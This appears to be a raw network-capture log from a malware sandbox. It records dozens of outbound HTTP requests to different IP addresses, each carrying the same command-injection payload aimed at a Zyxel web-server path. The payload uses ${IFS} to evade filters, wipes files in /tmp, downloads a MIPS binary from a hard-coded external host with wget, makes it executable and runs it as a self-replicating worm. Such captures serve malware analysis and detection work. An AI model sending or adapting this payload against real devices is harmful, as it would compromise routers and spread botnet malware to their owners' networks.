                                                Jan 29, 2024 07:07:45.266238928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3598192.168.2.2347528212.159.41.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.266288042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3599192.168.2.2349234165.44.168.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.266352892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3600192.168.2.2353326164.112.50.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.266406059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3601192.168.2.2353818201.128.103.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.266467094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3602192.168.2.234637279.193.98.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.266526937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3603192.168.2.2352948178.191.136.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.266621113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3604192.168.2.233329680.58.108.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.266648054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3605192.168.2.2333022156.61.236.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.266699076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3606192.168.2.235617434.234.59.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.266765118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3607192.168.2.2344142103.2.47.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.266829014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3608192.168.2.2333638220.101.120.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.266902924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3609192.168.2.235911834.150.219.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.266973972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3610192.168.2.2359804165.229.195.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.267028093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3611192.168.2.2349002156.26.212.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.267086983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3612192.168.2.2358412182.242.14.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.267148972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3613192.168.2.234022060.80.44.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.267210960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3614192.168.2.2352344146.241.37.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.267268896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3615192.168.2.233695869.28.243.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.267326117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3616192.168.2.235662454.197.93.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.267394066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3617192.168.2.2334572165.206.33.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.267453909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3618192.168.2.2335568180.51.82.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.267538071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3619192.168.2.235545825.231.183.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.267586946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3620192.168.2.2357072179.48.161.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.267649889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3621192.168.2.2341508158.212.32.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.267713070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3622192.168.2.235093085.21.245.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.267774105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3623192.168.2.2346242158.178.14.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.267863989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3624192.168.2.2354624181.43.79.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.267911911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3625192.168.2.233957094.105.212.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.267990112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3626192.168.2.2341252216.95.60.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.268064976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3627192.168.2.233921281.72.120.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.268127918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3628192.168.2.235153814.145.54.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.268199921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3629192.168.2.2358970101.100.234.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.268254995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3630192.168.2.2353316223.1.147.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.268325090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3631192.168.2.2342682126.85.45.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.268398046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3632192.168.2.234719282.47.55.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.268456936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3633192.168.2.235346217.110.158.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.268531084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3634192.168.2.234250881.12.83.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.268595934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3635192.168.2.2360792164.91.10.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.268656015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3636192.168.2.2337262139.245.139.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.268718004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3637192.168.2.2357290136.148.206.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.268793106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3638192.168.2.2358628217.89.129.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.268829107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3639192.168.2.234932675.130.202.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.268882036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3640192.168.2.2337376118.110.166.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.268948078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3641192.168.2.2336596148.206.205.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.269001007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3642192.168.2.234908071.183.237.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.269067049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3643192.168.2.2358282121.186.7.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.269128084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3644192.168.2.2350902196.86.112.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.269185066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3645192.168.2.234040437.116.5.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.269249916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3646192.168.2.2348370102.138.250.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.269318104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3647192.168.2.2344700101.138.20.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.269381046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3648192.168.2.235206671.165.101.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.269449949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3649192.168.2.233447017.41.116.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.269522905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3650192.168.2.2343426221.231.115.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.269571066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3651192.168.2.234502446.142.61.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.269633055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3652192.168.2.2346062191.210.86.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.269712925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3653192.168.2.2353098165.172.144.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.269762039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3654192.168.2.233439268.198.18.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.269824028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3655192.168.2.2339418160.35.140.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.269870043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3656192.168.2.2358850139.98.98.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.269936085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3657192.168.2.2344206211.94.212.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.269988060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3658192.168.2.2354046176.48.12.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.270051003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3659192.168.2.2334260143.145.249.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.270114899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3660192.168.2.2341264128.210.21.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.270165920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3661192.168.2.234214658.180.242.158443
                                                TimestampBytes transferredDirectionData
